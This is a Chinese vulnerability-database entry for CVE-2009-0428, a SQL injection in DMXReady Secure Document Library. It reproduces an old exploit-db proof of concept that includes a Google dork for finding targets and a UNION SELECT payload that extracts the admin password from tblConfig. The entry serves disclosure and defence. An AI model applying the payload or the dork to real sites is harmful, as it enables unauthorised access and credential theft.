DMXReady Secure Document Library 'upload_image_category.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117231 漏洞类型 SQL注入
发布时间 2009-01-14 更新时间 2009-02-04
CVE编号 CVE-2009-0428 CNNVD-ID CNNVD-200902-110
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7787
https://www.securityfocus.com/bid/80626
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-110
|漏洞详情
DMXReadySecureDocumentLibrary1.1及之前版本中的CategoryManager/upload_image_category.asp存在SQL注入漏洞。远程攻击者可以借助cid参数,执行任意的SQL指令。
|漏洞EXP
*******************************************************************************
# Title   :  DMXReady Secure Document Library <= 1.1 Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  189.97 $
# Dork    :  inurl:inc_securedocumentlibrary.asp
# DorkEx  :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_securedocumentlibrary.asp&btnG=Ara&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]

You Find-> http://[target]/[path]/applications/SecureDocumentLibrary/inc_securedocumentlibrary.asp
Edit    -> http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=
[SQL Inject]


Example:

USERNAME->
/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig

PASSWORD->
/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig

Admin Login->
/admin/SecureDocumentLibrary/admin.asp

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2009-01-14]
|受影响的产品
DMXReady Secure Document Library 1.1 DMXReady Secure Document Library 1.0
|参考资料

来源:XF
名称:securedocumentlibrary-uploadimage-sql-inj(48013)
链接:http://xforce.iss.net/xforce/xfdb/48013
来源:BID
名称:33253
链接:http://www.securityfocus.com/bid/33253
来源:SECUNIA
名称:33482
链接:http://secunia.com/advisories/33482
来源:MILW0RM
名称:7787
链接:http://milw0rm.com/exploits/7787
来源:dmxready.helpserve.com
链接:http://dmxready.helpserve.com/index.php?_m=news&_a=viewnews&newsid=12
来源:dmxready.helpserve.com
链接:http://dmxready.helpserve.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=93